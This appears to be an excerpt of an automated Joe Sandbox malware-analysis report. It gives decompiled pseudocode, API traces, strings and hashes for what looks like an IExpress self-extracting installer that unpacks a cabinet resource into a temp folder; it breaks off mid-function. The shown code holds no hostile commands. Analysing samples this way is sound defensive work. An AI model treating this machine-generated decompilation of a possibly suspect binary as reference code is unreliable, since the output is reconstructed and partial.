			E00074FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x79144 = E0007468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x79140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x78584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x78584, 0x841), 5);
				}
				_t10 = E00074EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00074CA0, E00074CC0, E00074980, E00074A50, E00074AD0, E00074B60, E00074BC0, 1, 0x79148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x79148; // 0x0
						_t24 =  *0x78584; // 0x0
						E000744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x71140, 0, E00074CD0, 0, 0x79140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x78584; // 0x0
					E000744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x79140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x79140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x791d8; // 0x0
						if(_t47 == 0) {
							E000744B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x78a38 & 0x00000001) == 0 && ( *0x79a34 & 0x00000001) == 0) {
						SendMessageA( *0x78584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00074fe0
0x00074fe6
0x00074ff9
0x0007500d
0x00075013
0x0007501a
0x00075163
0x00075163
0x00075020
0x00075027
0x00075037
0x00075051
0x00075051
0x00075057
0x0007505e
0x000750a7
0x000750ad
0x000750b4
0x000750e8
0x000750e8
0x000750ee
0x000750ff
0x00075104
0x00075106
0x00000000
0x00075106
0x000750cd
0x000750d3
0x000750da
0x00000000
0x00000000
0x000750dd
0x000750e6
0x00000000
0x00000000
0x00000000
0x00075060
0x00075060
0x00075070
0x00075075
0x00075107
0x00075107
0x0007510e
0x00075111
0x00075117
0x00075117
0x0007511f
0x00075121
0x00075127
0x00075135
0x00075135
0x00075127
0x00075141
0x00075159
0x00075159
0x00000000
0x0007515f

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00074FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00075006
LockResource.KERNEL32(00000000), ref: 0007500D
GetDlgItem.USER32(00000000,00000842), ref: 00075030
ShowWindow.USER32(00000000), ref: 00075037
GetDlgItem.USER32(00000841,00000005), ref: 0007504A
ShowWindow.USER32(00000000), ref: 00075051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00075111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00075159

Strings

*MEMCAB, xrefs: 000750C7
CABINET, xrefs: 00074FE6, 00074FF7

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 8d119d56c24a3e2113354af14c440937cd0e365312b4ad85d38358616c852f24
Instruction ID: 28a6f1d4fa568e760331413330ba2a72cb187ef082d426d426b72e1b136e22e6
Opcode Fuzzy Hash: 8d119d56c24a3e2113354af14c440937cd0e365312b4ad85d38358616c852f24
Instruction Fuzzy Hash: 233107B0F80701BFF7605B61AC8DFAB369CA745756F44C024BA0DB61E1DBBC8C808669

Uniqueness

Uniqueness Score: -1.00%

Function 000744B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E000744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x78004; // 0xa87cf02e
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x78a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x79a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00071680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0007171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0007171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0007681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E000767C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "siga30", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0007681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E000767C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "siga30", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00076CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x000744b9
0x000744c4
0x000744cb
0x000744d8
0x000744e4
0x000744eb
0x000744ee
0x000744ef
0x000744ef
0x000744f1
0x000744f7
0x000744f8
0x0007467b
0x000744fe
0x00074509
0x00074518
0x00074525
0x00074562
0x00074568
0x00074568
0x0007456b
0x0007456b
0x0007456d
0x0007456e
0x00074572
0x00074578
0x0007457c
0x000745cb
0x00074607
0x00074607
0x0007460d
0x00074613
0x00074617
0x00000000
0x0007461d
0x00074623
0x00074626
0x00074628
0x00000000
0x00074628
0x000745cd
0x000745cd
0x000745cf
0x000745cf
0x000745d2
0x000745d2
0x000745d4
0x000745d5
0x000745db
0x000745de
0x000745e3
0x000745e9
0x000745ed
0x00000000
0x000745f3
0x000745fd
0x00000000
0x00074602
0x000745ed
0x0007457e
0x0007457e
0x00074580
0x00074580
0x00074583
0x00074583
0x00074585
0x00074586
0x0007458a
0x0007458c
0x0007458f
0x0007458f
0x00074591
0x00074592
0x0007459b
0x0007459e
0x000745a3
0x000745a9
0x000745ad
0x00000000
0x000745af
0x000745af
0x000745bf
0x0007462d
0x00074630
0x0007463d
0x0007464e
0x0007464e
0x0007463f
0x00074640
0x00074647
0x0007464c
0x00000000
0x00000000
0x0007464c
0x00074666
0x0007466d
0x0007466f
0x00074675
0x00074675
0x000745ad
0x00074527
0x0007452e
0x0007453f
0x0007453f
0x00074530
0x00074531
0x00074538
0x0007453d
0x00000000
0x00000000
0x0007453d
0x00074554
0x0007455a
0x0007455a
0x0007455a
0x00074525
0x0007468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554
LocalAlloc.KERNEL32(00000040,00000065), ref: 000745A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 000745E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0007460D
MessageBeep.USER32(00000000), ref: 00074630
MessageBoxA.USER32(?,00000000,siga30,00000000), ref: 00074666
LocalFree.KERNEL32(00000000), ref: 0007466F

Part of subcall function 0007681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0007686E
Part of subcall function 0007681F: GetSystemMetrics.USER32(0000004A), ref: 000768A7
Part of subcall function 0007681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000768CC
Part of subcall function 0007681F: RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,?,0000000C), ref: 000768F4
Part of subcall function 0007681F: RegCloseKey.ADVAPI32(?), ref: 00076902

Strings

LoadString() Error. Could not load string resource., xrefs: 000744E4
siga30, xrefs: 00074545, 0007465A

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$siga30
API String ID: 3244514340-1850386852
Opcode ID: fe8898066a09108acdc6c7cd6d4226a2d231820196ff805eb2517821cda58e18
Instruction ID: 860ddc5bb2431087a1fb4d6dbc56b506e8b6a06e870e04207bc413d3e3049dc5
Opcode Fuzzy Hash: fe8898066a09108acdc6c7cd6d4226a2d231820196ff805eb2517821cda58e18
Instruction Fuzzy Hash: 4B51E771E005196BEB219F28CC48BEA7BA9EF86300F148194FD0DB7242DB3D9D45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 000753A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E000753A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x78004; // 0xa87cf02e
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0007171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00071680(_t32, 0x104, _t20);
					E0007658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00076CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x78a20 = 1;
				goto L5;
			}

0x000753ac
0x000753b3
0x000753b9
0x000753bb
0x000753bd
0x000753bf
0x000753d1
0x000753d6
0x000753e0
0x000753e2
0x000753f5
0x000753fb
0x00075402
0x0007540b
0x00000000
0x00000000
0x00075413
0x00000000
0x00000000
0x00075415
0x00075416
0x00075427
0x0007542a
0x0007542b
0x00075434
0x00075434
0x0007543a
0x0007544c
0x0007544c
0x00075452
0x0007545a
0x00000000
0x00000000
0x0007545e
0x0007545f
0x00000000

APIs

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000753FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075452

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000753B7, 000753E1, 0007541E
IXP, xrefs: 00075419
IXP%03d.TMP, xrefs: 000753C0

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2414463295
Opcode ID: 2d419401d7af156d1ea43a8d2b9a17320f35692d18dbe38fd3e446b6bf4fc9e9
Instruction ID: 202bc7fd2d0c1ef82fda8236591191a82ec7b0e0c994e9339cd9d3d90095f587
Opcode Fuzzy Hash: 2d419401d7af156d1ea43a8d2b9a17320f35692d18dbe38fd3e446b6bf4fc9e9
Instruction Fuzzy Hash: D711C871F0050467F7209B269C49FEF766DEBC6716F008525B64EE21D1CEBC898286A9

Uniqueness

Uniqueness Score: -1.00%

Function 00075467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00075467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x78004; // 0xa87cf02e
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x791e4;
					_t42 = 0x104;
					E00071680(0x791e4, 0x104);
					L14:
					_t13 = E000758C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x79124 = 0;
							_t14 = 1;
							L24:
							return E00076CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0007597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x78a20; // 0x0
						if(_t61 != 0) {
							 *0x78a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x79124 = E00076285();
						goto L22;
					}
					 *0x78a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E000753A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x791e4;
				E00071781(0x791e4, 0x104, __ecx,  &_v268);
				if(( *0x79a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0007658A(_t48, 0x104, 0x71140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0007658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00075472
0x00075479
0x00075481
0x00075484
0x0007551c
0x00075521
0x00075528
0x0007552d
0x0007552f
0x00075539
0x0007554d
0x0007554d
0x00075552
0x00075585
0x00075585
0x0007558b
0x0007558d
0x0007559d
0x0007559d
0x00075557
0x0007555e
0x00000000
0x00000000
0x00075560
0x00075566
0x00075569
0x0007556f
0x0007556f
0x00075581
0x00075581
0x00000000
0x00075581
0x00075545
0x0007557c
0x00000000
0x0007557c
0x00075547
0x00000000
0x00075547
0x0007548a
0x00075490
0x00075497
0x00000000
0x00000000
0x0007549d
0x000754ab
0x000754b4
0x000754c0
0x0007550c
0x00075511
0x00075515
0x00000000
0x00075515
0x000754c9
0x000754d6
0x000754d8
0x000754fe
0x00075503
0x00075507
0x00000000
0x00075507
0x000754da
0x000754dd
0x000754f7
0x00000000
0x000754f7
0x000754df
0x000754e2
0x000754f0
0x00000000
0x000754f0
0x000754e7
0x00000000
0x00000000
0x000754e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000754C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007556F

Part of subcall function 000753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000753FB
Part of subcall function 000753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075402
Part of subcall function 000753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007541F
Part of subcall function 000753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007542B
Part of subcall function 000753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075434

Strings

ppc, xrefs: 000754E9
mips, xrefs: 000754F7
alpha, xrefs: 000754F0
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 0007547D, 00075481, 000754AB, 0007551C, 0007553C, 00075568
i386, xrefs: 000754FE

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-2738818301
Opcode ID: 1022ea62e254f458f95923002df6cad7e31b40c3545205db4aaad7ef36e30b50
Instruction ID: bddd9f6598996fbb0d3c99bc71eb56870128464ba61a74d1cc962197fee2c958
Opcode Fuzzy Hash: 1022ea62e254f458f95923002df6cad7e31b40c3545205db4aaad7ef36e30b50
Instruction Fuzzy Hash: 6B313870F00E055BEB609B399C145FE73DAAB81302B04C02AA90E96581DAFC8E4186DD

Uniqueness

Uniqueness Score: -1.00%

Function 0007256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0007256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E000724E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00072572
0x00072573
0x00072575
0x00072578
0x0007257d
0x00072627
0x00072583
0x00072586
0x00072589
0x000725eb
0x00072607
0x00000000
0x00072609
0x0007261a
0x00000000
0x0007261a
0x00000000
0x0007258b
0x0007258b
0x0007259e
0x000725b2
0x000725ba
0x000725cb
0x000725d1
0x000725d6
0x000725da
0x000725dd
0x000725dd
0x000725e3
0x000725e3
0x000725e3
0x0007258b
0x00072589
0x0007262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00074096,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?), ref: 000725B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?,00074096), ref: 000725CB
RegCloseKey.KERNELBASE(?,?,00071ED3,00000001,00000000,?,?,00074137,?,00074096), ref: 000725DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00074096,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?), ref: 000725FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00074096,00000000,00000000,00000000,00000000,?,00071ED3,00000001,00000000), ref: 0007261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000725F5
PendingFileRenameOperations, xrefs: 000725C3
System\CurrentControlSet\Control\Session Manager, xrefs: 000725A8

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 9ca435f2c74eeff74cf01b061701e828f052730f9534e4ee2211cf6bdcabccbc
Instruction ID: 3258154a736c4f099e5337e9d132a58617dc863dd4d74fcd1345071f1510976f
Opcode Fuzzy Hash: 9ca435f2c74eeff74cf01b061701e828f052730f9534e4ee2211cf6bdcabccbc
Instruction Fuzzy Hash: 45113D35E42228FBAB209B919C0DDFFBEACEB467A1F108055B90CA2011D6385B44D6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00076A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00077155();
				_push(0x58);
				_push(0x772b8);
				E00077208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x788b0 - _t58; // 0x2
